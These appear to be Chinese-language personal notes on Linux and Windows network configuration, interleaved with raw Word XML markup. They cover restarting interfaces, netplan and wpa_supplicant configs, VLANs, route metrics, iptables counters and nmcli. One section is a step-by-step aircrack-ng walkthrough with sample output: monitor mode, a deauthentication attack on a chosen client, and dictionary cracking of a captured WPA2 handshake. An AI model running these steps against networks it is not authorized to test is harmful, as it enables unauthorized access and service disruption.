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07-网卡设置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网卡重启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在Linux中：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通常，你可以使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>ifdown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ifup</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>命令来关闭和启动网卡。假设你的网卡接口名称为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>eth0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>，则可以：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ifdown eth0</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>sudo ifup eth0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在一些Linux发行版中，特别是那些使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>systemd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>的系统，你可以使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>ip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systemctl</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>命令来管理网络接口：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ip link set eth0 down</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>sudo ip link set eth0 up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或者使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>systemctl</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>重启网络服务（这可能会影响所有网络接口）：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systemctl restart networking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sudo systemctl restart networking.service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color w:val="3370ff"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">1.2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>在Ubuntu 17.10及以后的版本中：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你可以使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>netplan</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>来应用配置并重启网络：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netplan apply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1.3 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>在CentOS 7 和其他使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="true"/>
          <w:sz w:val="30"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>NetworkManager</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>的系统中：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你可以使用下面的命令：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nmcli networking off</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>sudo nmcli networking on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或者重启特定的网卡：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nmcli connection down eth0</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>sudo nmcli connection up eth0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1.4 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>在Windows中：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在Windows命令行（cmd）中，你可以使用以下命令来重置TCP/IP堆栈，这在许多情况下等同于重启网卡：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netsh winsock reset</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>netsh int ip reset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然后重启计算机以使更改生效。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或者，你也可以禁用再启用特定网络接口，通过“网络连接”界面或者使用Powershell命令：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PowerShell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Disable-NetAdapter -Name "适配器名称"</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Enable-NetAdapter -Name "适配器名称"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无线连接-树莓派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设置无线连接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/etc/wpa_supplicant/wpa_supplicant.conf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例子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#接口设置</w:t>
              <w:br/>
              <w:t>ctrl_interface=DIR=/var/run/wpa_supplicant GROUP=netdev</w:t>
              <w:br/>
              <w:t>update_config=1</w:t>
              <w:br/>
              <w:t>#国家码设置</w:t>
              <w:br/>
              <w:t>country=CN</w:t>
              <w:br/>
              <w:t> </w:t>
              <w:br/>
              <w:t> </w:t>
              <w:br/>
              <w:t>#网络信息配置</w:t>
              <w:br/>
              <w:t>network={</w:t>
              <w:br/>
              <w:t>        ssid="NTest"       # wifi账号</w:t>
              <w:br/>
              <w:t>        psk="12345678"     # wifi密码，一般要&gt;8个字符</w:t>
              <w:br/>
              <w:t>        key_mgmt=WPA-PSK   # 密钥管理算法，通常家用路由都是WPA-PSK，企业路由是WPA-EAP</w:t>
              <w:br/>
              <w:t>        # 如果要连接的wifi是没有密码的，需要配置为：key_mgmt=NONE</w:t>
              <w:br/>
              <w:t>        disabled=1         # 使能</w:t>
              <w:br/>
              <w:t>        # 其他参数：</w:t>
              <w:br/>
              <w:t>        scan_ssid=1        # 对于隐藏的SSID，需要配置此参数</w:t>
              <w:br/>
              <w:t>        priority=1         # 优先级，如果有多个wifi需要保存，在不同network字典中可以配置不同的优先级，数字越小，优先级越高</w:t>
              <w:br/>
              <w:t>}</w:t>
              <w:br/>
              <w:t>network={</w:t>
              <w:br/>
              <w:t>        ssid="River_Test"</w:t>
              <w:br/>
              <w:t>        psk="12345678"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树莓派查找IP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 ping raspberrypi.local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网卡设置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/etc/netplan/config.yaml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Let NetworkManager manage all devices on this system</w:t>
              <w:br/>
              <w:t>network:</w:t>
              <w:br/>
              <w:t xml:space="preserve">  version: 2</w:t>
              <w:br/>
              <w:t xml:space="preserve">  renderer: NetworkManager</w:t>
              <w:br/>
              <w:t xml:space="preserve">  ethernets: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t>enp2s0f0</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>:</w:t>
              <w:br/>
              <w:t xml:space="preserve">          dhcp4: no</w:t>
              <w:br/>
              <w:t xml:space="preserve">  vlans:</w:t>
              <w:br/>
              <w:t xml:space="preserve">      vlan3:</w:t>
              <w:br/>
              <w:t xml:space="preserve">          id: 3</w:t>
              <w:br/>
              <w:t xml:space="preserve">          link: enp2s0f0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addresses: [ "</w:t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t>172.31.3.103</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>/24" ]</w:t>
              <w:br/>
              <w:t xml:space="preserve">      vlan30:</w:t>
              <w:br/>
              <w:t xml:space="preserve">          id: 30</w:t>
              <w:br/>
              <w:t xml:space="preserve">          link: enp2s0f0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addresses: [ "</w:t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t>172.31.30.103</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>/24" 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ip 设置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IP地址、子网掩码、网关、DNS服务器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/etc/network/interfaces</w:t>
              <w:br/>
              <w:t> </w:t>
              <w:br/>
              <w:t>#设置 lo</w:t>
              <w:br/>
              <w:t>auto lo</w:t>
              <w:br/>
              <w:t>iface lo inet loopback</w:t>
              <w:br/>
              <w:t> </w:t>
              <w:br/>
              <w:t>#设置eth0 DHCP</w:t>
              <w:br/>
              <w:t>auto eth0</w:t>
              <w:br/>
              <w:t>DEVICE=eth0</w:t>
              <w:br/>
              <w:t>ONBOOT=yes</w:t>
              <w:br/>
              <w:t>TYPE=Ethernet</w:t>
              <w:br/>
              <w:t>HWADDR=00:0c:29:02:88:54</w:t>
              <w:br/>
              <w:t>BOOTPROTO=dhcp</w:t>
              <w:br/>
              <w:t>NM_CONTROLLED=yes</w:t>
              <w:br/>
              <w:t>UUID=4c3bb601-cf11-4967-93c1-c7195700500d</w:t>
              <w:br/>
              <w:t> </w:t>
              <w:br/>
              <w:t>#设置eth0 固定IP</w:t>
              <w:br/>
              <w:t>#auto eth0</w:t>
              <w:br/>
              <w:t>#iface eth0 inet static</w:t>
              <w:br/>
              <w:t>#address 192.168.169.210</w:t>
              <w:br/>
              <w:t>#netmask 255.255.255.0</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>#gateway 192.168.169.1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4.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>更改物理地址</w:t>
      </w:r>
      <w:bookmarkEnd w:id="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配置物理网口eth1的MAC地址为aa:bb:cc:dd:ee:21</w:t>
              <w:br/>
              <w:t>## 需提前沟通ip（包括ip地址和子网掩码）和MAC</w:t>
              <w:br/>
              <w:t>sudo ifconfig eth1 down</w:t>
              <w:br/>
              <w:t>## ether后是MAC地址</w:t>
              <w:br/>
              <w:t>sudo ifconfig eth1 hw ether aa:bb:cc:dd:ee:21</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>sudo ifconfig eth1 up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color w:val="3370ff"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">4.2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>给网卡配置VLAN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给物理网口eth1配置vlan id为3 ip地址为172.20.3.34/24 的vlan网口</w:t>
              <w:br/>
              <w:t>sudo ip link add link eth1 name eth1.3 type vlan id 3</w:t>
              <w:br/>
              <w:t>sudo ip addr add 172.20.3.34/24 dev eth1.3</w:t>
              <w:br/>
              <w:t>sudo ip link set dev eth1.3 down</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>sudo ip link set dev eth1.3 up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color w:val="3370ff"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">4.3 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>虚拟网卡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虚拟网卡也有mac地址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网卡、网关ip地址不一样。网卡设备ip地址，网关负责将网卡发数据转其他网络。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网关：网关是连接两个不同网络之间的设备。工作在网络层（第三层）。ip数据包转发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交换机：交换机是用于在局域网（LAN）内部的设备之间转发数据的设备。它是在数据链路层工作的，通过学习和维护MAC地址表。工作在数据链路层（第二层）。MAC数据包转发。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color w:val="3370ff"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">4.4 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>固定网络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固定 ip和 静态 dns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/etc/dhcpcd.conf</w:t>
              <w:br/>
              <w:t xml:space="preserve">interface wlan0 static ip_address=192.168.1.11/24 </w:t>
              <w:br/>
              <w:t xml:space="preserve">static routers=192.168.1.1 </w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>static domain_name_servers=192.168.1.1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只走 eth0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/etc/dhcpcd.conf</w:t>
              <w:br/>
              <w:t xml:space="preserve">interface wlan0 </w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>nogateway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优先走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/etc/dhcpcd.conf</w:t>
              <w:br/>
              <w:t>interface wlan0</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>metric 500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route 可以查看metric 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命令行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ip route add default via &lt;eth0的网关地址&gt; dev eth0 metric 0</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>sudo ip route add default via &lt;wlan0的网关地址&gt; dev wlan0 metric 500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 在网络路由中，Metric是指测量距离的单位，它是一个数值，用于确定到达目的地所需的最小距离。在Linux中，Metric是一个网络接口的属性，用于指定该接口的优先级。当系统有多个网络接口时，通过指定Metric的值，可以控制系统使用哪个接口来进行通信。 Metric的值越小，优先级越高，系统就越可能通过该接口发送数据。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在上面提到的情况中，可以通过修改wlan0接口的Metric值，使得系统优先使用eth0接口来发送数据。例如，可以将wlan0接口的Metric值设置为一个比较大的数值，例如500，这样系统就会优先使用eth0接口来进行通信。具体操作可以使用以下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流量统计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iptbles统计方案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轻量级比pcap消耗少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本地网卡  192.168.20.141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1、添加规则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iptables -I INPUT -d 192.168.20.141   输入数据的目的地址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iptables -I OUTPUT -s 192.168.20.141 输出数据的源地址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2、统计流量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iptables -n -v -L -t filter -x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4572000" cy="17716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3、如果添加规则是阻止进入统计结果就是被阻挡数据，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iptbles -I INPUT -d 192.168.20.141  -j DROP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4572000" cy="17335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原先允许进入无法接收，数据就不会变化，只有阻止数据在统计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>wifi操作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https://github.com/conwnet/wpa-dictionary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color w:val="3370ff"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">6.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>aircrack-ng工具</w:t>
      </w:r>
      <w:bookmarkEnd w:id="15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color w:val="3370ff"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">6.1.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>安装工具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Install | 安装 aircrack-ng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 install aircrack-ng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color w:val="3370ff"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">6.1.2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>查看网卡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View available wireless network cards | 查看可用的无线网卡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使用命令：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>airmon-ng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netcon@conwlt:~/workspace$ sudo airmon-ng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color w:val="3370ff"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">6.1.3 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>开启监听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Specify the wireless network card to turn on the monitor mode | 指定无线网卡开启监听模式。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使用命令：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>airmon-ng start &lt;网卡名称&gt;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airmon-ng start wlp6s0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根据以上输出，已经把 wlp6s0 这块无线网卡开启监听模式，开启后名字是 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>wlp6s0mon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color w:val="3370ff"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">6.1.4 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>扫描无线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Scan for nearby wireless networks | 扫描附近的无线网络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使用命令：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>airodump-ng &lt;处于监听模式的网卡名称&gt;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airodump-ng wlp6s0mon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netcon@conwlt:~/workspace$ sudo airodump-ng wlp6s0mon</w:t>
              <w:br/>
              <w:br/>
              <w:t xml:space="preserve"> CH  5 ][ Elapsed: 12 s ][ 2018-10-07 18:49              </w:t>
              <w:br/>
              <w:br/>
              <w:t xml:space="preserve"> BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID</w:t>
              <w:br/>
              <w:br/>
              <w:t xml:space="preserve"> 22:47:DA:62:2A:F0  -50       51       12    0   6  54e. WPA2 CCMP   PSK  AndroidAP    </w:t>
              <w:br/>
              <w:br/>
              <w:t xml:space="preserve"> BSSID              STATION            PWR   Rate    Lost    Frames  Probe                                  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22:47:DA:62:2A:F0  AC:BC:32:96:31:8D  -31    0 -24e     0       16  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这一步会输出两个列表，两个列表不停在刷新。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第一个列表表示扫描到的无线网络 AP 信息，会用到以下几列信息：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BSSID: 无线 AP 的硬件地址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PWR: 信号强度，值是负数，绝对值越小表示信号越强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CH: 无线网络信道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ENC: 加密方式，我们要破解的是 WPA2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ESSID: 无线网络的名称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第二个列表表示某个无线网络中和用户设备的连接信息：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BSSID: 无线 AP 的硬件地址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STATION: 用户设备的硬件地址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color w:val="3370ff"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">6.1.5 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>保存记录数据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使用参数过滤扫描列表，确定扫描目标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使用命令：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>airodump-ng -w &lt;扫描结果保存的文件名&gt; -c &lt;无线网络信道&gt; --bssid &lt;目标无线 AP 的硬件地址&gt; &lt;处于监听模式的网卡名称&gt;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netcon@conwlt:~/workspace$ sudo airodump-ng -w android -c 6 --bssid 22:47:DA:62:2A:F0 wlp6s0mon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color w:val="3370ff"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">6.1.6 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>发起攻击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 aireplay-ng 对目标设备发起攻击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使用命令：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>aireplay-ng -&lt;攻击模式&gt; &lt;攻击次数&gt; -a 无线 AP 硬件地址&gt; -c &lt;用户设备硬件地址&gt; &lt;处于监听模式的网卡名称&gt;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netcon@conwlt:~$ sudo aireplay-ng -0 0 -a 22:47:DA:62:2A:F0 -c AC:BC:32:96:31:8D wlp6s0mon</w:t>
              <w:br/>
              <w:t>18:57:31  Waiting for beacon frame (BSSID: 22:47:DA:62:2A:F0) on channel 6</w:t>
              <w:br/>
              <w:t>18:57:32  Sending 64 directed DeAuth. STMAC: [AC:BC:32:96:31:8D] [41|64 ACKs]</w:t>
              <w:br/>
              <w:t>18:57:33  Sending 64 directed DeAuth. STMAC: [AC:BC:32:96:31:8D] [19|121 ACKs]</w:t>
              <w:br/>
              <w:t>18:57:33  Sending 64 directed DeAuth. STMAC: [AC:BC:32:96:31:8D] [11|80 ACKs]</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>...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color w:val="3370ff"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">6.1.7 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>暴力破解</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> 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 aircrack-ng 暴力破解 Wi-Fi 密码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使用命令：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>aircrack-ng -w 密码字典 &lt;包含握手包的 cap 文件&gt;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netcon@conwlt:~/workspace$ aircrack-ng -w wpa-dictionary/common.txt android-01.cap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3" w:id="23"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:color w:val="3370ff"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">6.1.8 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>退出监听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无线网卡退出监听模式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使用命令：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>airmon-ng stop &lt;处于监听模式的无限网卡名称&gt;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netcon@conwlt:~/workspace$ sudo airmon-ng stop wlp8s0mon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color w:val="3370ff"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">7. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>iwlist工具</w:t>
      </w:r>
      <w:bookmarkEnd w:id="24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查看无线接口：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iwconfig</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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扫描端口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iwlist wlan0 scanning</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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无线频段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iwlist wlan0 scan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4G的频率和频段是：1880-1900MHz、2320-2370MHz、2575-2635MHz。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5G的频率和频段为：3300-3400MHz、3400-3600MHz和4800-5000MHz。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5" w:id="25"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:color w:val="3370ff"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">8. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>NetworkManager工具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1、查看网络状态：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nmcli general status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2、列出所有可用的网络连接：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nmcli connection show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3、启用/禁用一个网络连接：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nmcli connection up &lt;connection-name</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>nmcli connection down &lt;connection-name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4、查看所有可用的 Wi-Fi 网络：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nmcli device wifi list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5、连接到一个 Wi-Fi 网络：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nmcli device wifi connect &lt;SSID password &lt;password&gt;&gt;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6、创建一个新的网络连接：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nmcli connection add type &lt;connection-type con-name &lt;connection-name ifname &lt;interface-name ...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7、修改一个现有的网络连接：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nmcli connection modify &lt;connection-name &lt;property &lt;value&gt;&gt;&gt;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8、删除一个网络连接：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nmcli connection delete &lt;connection-name&gt;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9、查看网络接口状态：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nmcli device 